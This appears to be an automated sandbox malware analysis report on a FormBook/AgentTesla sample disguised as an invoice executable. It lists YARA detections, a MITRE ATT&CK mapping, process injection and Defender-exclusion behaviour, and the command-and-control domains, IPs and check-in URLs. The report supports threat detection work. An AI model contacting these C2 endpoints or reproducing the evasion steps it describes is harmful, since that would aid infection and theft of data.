Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation1 | Scheduled Task/Job1 | Process Injection512 | Masquerading1 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job1 | Boot or Logon Initialization Scripts | Scheduled Task/Job1 | Disable or Modify Tools11 | LSASS Memory | Security Software Discovery431 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Shared Modules1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion151 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Virtualization/Sandbox Evasion151 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Application Window Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing3 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery112 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction

          Behavior Graph

Behavior Graph ID: 402848 | Sample: HAWB AND INV.exe | Startdate: 03/05/2021 | Architecture: WINDOWS | Score: 100

Process tree, dropped files, signatures and contacted hosts recovered from the behavior graph (the graph image itself is not reproduced here):

Sample level: www.jaimericart.com; www.beachrockisland.com; 2 other IPs or domains. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 10 other signatures.
HAWB AND INV.exe (started): dropped C:\Users\user\AppData\...\qxnptkmQbHB.exe (PE32), C:\Users\user\AppData\Local\...\tmp9D41.tmp (XML), C:\Users\user\...\HAWB AND INV.exe.log (ASCII). Signature: Adds a directory exclusion to Windows Defender. Started: HAWB AND INV.exe, powershell.exe, powershell.exe, 2 other processes.
HAWB AND INV.exe (child process): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection). Injected: explorer.exe.
powershell.exe (both instances) and the 2 other processes: started conhost.exe.
explorer.exe (injected): www.premier-moment.info 202.254.234.152, 49757, 80 SAKURA-CSAKURAInternetIncJP Japan; ecosanhn.com 181.214.142.2, 49760, 80 ASDETUKhttpwwwheficedcomGB Chile; 8 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings. Started: ipconfig.exe.
ipconfig.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
HAWB AND INV.exe | 21% | ReversingLabs | Win32.Trojan.AgentTesla

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe | 21% | ReversingLabs | Win32.Trojan.AgentTesla

          Unpacked PE Files

Source | Detection | Scanner | Label
10.2.HAWB AND INV.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner
www.premier-moment.info | 0% | Virustotal
ecosanhn.com | 0% | Virustotal
jaimericart.com | 0% | Virustotal
networkingmaderas.com | 0% | Virustotal

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://go.microX% | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
www.alldaazz.com/maw9/ | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.premier-moment.info | 202.254.234.152 | true | true | - | unknown
ecosanhn.com | 181.214.142.2 | true | true | - | unknown
jaimericart.com | 81.88.48.71 | true | true | - | unknown
networkingmaderas.com | 107.180.57.119 | true | true | - | unknown
www.itechfreak.com | 192.238.144.41 | true | false | - | unknown
dinkoistmatrimony.com | 34.102.136.180 | true | false | - | unknown
curvygirlholiday.com | 34.102.136.180 | true | false | - | unknown
www.vipbrandwatch.info | unknown | unknown | true | - | unknown
www.networkingmaderas.com | unknown | unknown | true | - | unknown
www.beachrockisland.com | unknown | unknown | true | - | unknown
www.curvygirlholiday.com | unknown | unknown | true | - | unknown
www.dinkoistmatrimony.com | unknown | unknown | true | - | unknown
www.ecosanhn.com | unknown | unknown | true | - | unknown
www.jaimericart.com | unknown | unknown | true | - | unknown

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 | true | Avira URL Cloud: safe | unknown
www.alldaazz.com/maw9/ | true | Avira URL Cloud: safe | low
http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 | true | Avira URL Cloud: safe | unknown
http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 | false | Avira URL Cloud: safe | unknown
http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 | true | Avira URL Cloud: safe | unknown
http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 | false | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers? | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | - | high
https://go.micro | powershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://go.microX% | powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.tiro.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://go.cpanel.net/privacy | ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmp | false | - | high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.coml | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                                                    http://www.typography.netDexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://fontfabrik.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.fonts.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.sakkal.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://github.com/unguestHAWB AND INV.exefalse
                                                                  high
                                                                  https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGPropertyHAWB AND INV.exefalse
                                                                    high

                                                                    Contacted IPs


                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
181.214.142.2 | ecosanhn.com | Chile | 61317 | ASDETUKhttpwwwheficedcomGB | true
34.102.136.180 | dinkoistmatrimony.com | United States | 15169 | GOOGLEUS | false
107.180.57.119 | networkingmaderas.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
202.254.234.152 | www.premier-moment.info | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true

                                                                    General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 402848
Start date: 03.05.2021
Start time: 14:51:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 35s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: HAWB AND INV.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@16/19@9/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.2% (good quality ratio 7.3%)
• Quality average: 72%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 81
• Number of non-executed functions: 166
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 8.241.89.254, 8.238.29.254, 8.241.78.126, 8.238.29.126, 8.241.82.254, 40.88.32.150, 104.43.193.48, 13.64.90.137, 104.42.151.234, 20.50.102.62, 92.122.213.247, 92.122.213.249, 51.103.5.186, 52.155.217.156, 20.54.26.129, 40.64.100.89, 23.57.80.111
                                                                    • Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, download.windowsupdate.com, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

Time | Type | Description
14:52:21 | API Interceptor | 1x Sleep call for process: HAWB AND INV.exe modified
14:53:05 | API Interceptor | 123x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

